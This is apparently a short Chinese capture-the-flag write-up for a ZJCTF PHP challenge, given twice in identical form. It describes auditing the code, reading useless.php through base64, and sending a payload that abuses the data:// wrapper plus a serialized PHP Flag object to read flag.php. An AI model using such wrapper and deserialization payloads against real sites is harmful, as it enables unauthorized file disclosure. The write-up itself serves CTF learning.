一看就是代码审计啊。打开useless.php 发现空白就想用base64编码来查看。
用个在线php编码的来序列化
构造payload之后访问源码得到flag
text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}
over.
一看就是代码审计啊。打开useless.php 发现空白就想用base64编码来查看。
用个在线php编码的来序列化
构造payload之后访问源码得到flag
text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;}
over.